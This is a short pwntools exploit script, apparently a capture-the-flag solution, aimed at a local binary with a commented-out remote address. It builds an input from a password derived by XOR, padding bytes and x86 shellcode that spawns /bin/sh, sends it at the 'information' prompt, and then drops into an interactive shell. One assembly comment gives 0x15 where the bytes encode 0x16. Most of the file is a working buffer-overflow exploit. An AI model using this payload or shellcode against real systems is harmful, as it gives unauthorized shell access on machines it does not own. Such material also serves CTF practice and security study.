from pwn import *

# The expected "information" value is derived by XOR-ing two fixed strings
# character by character; only the first len(a) characters take part.
s = 'The_Pursuit_of_Happiness'
a = 'I_Need_BMW'
pas = ''.join(chr(ord(lhs) ^ ord(rhs)) for lhs, rhs in zip(s, a))

# Author's listing of the machine code below (kept as written):
# xor %ecx,%ecx
# push $0x21
# pop %eax
# sub %eax, 0x15
# push %ecx
# push $0x68732f2f
# push $0x6e69622f
# mov %esp,%ebx
# int $0x80
shellcode = "\x31\xc9\x6a\x21\x58\x83\xe8\x16\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"

# Payload layout: derived prefix, the tail of s, 0x5b filler bytes, then the code.
filler = 'a' * 0x5b
pas = pas + 't_of_Happiness' + filler + shellcode

# Local target binary; the remote endpoint is left commented out as in the original.
p = process('./5afea37c3946a')
# p = remote('101.71.29.5', 10034)

# Answer the three prompts in order, then hand the session to the user.
prompts = [
    ('user name : ', 'a'),
    ('password : ', 'b'),
    ('information: ', pas),
]
for prompt, answer in prompts:
    p.sendlineafter(prompt, answer)
p.interactive()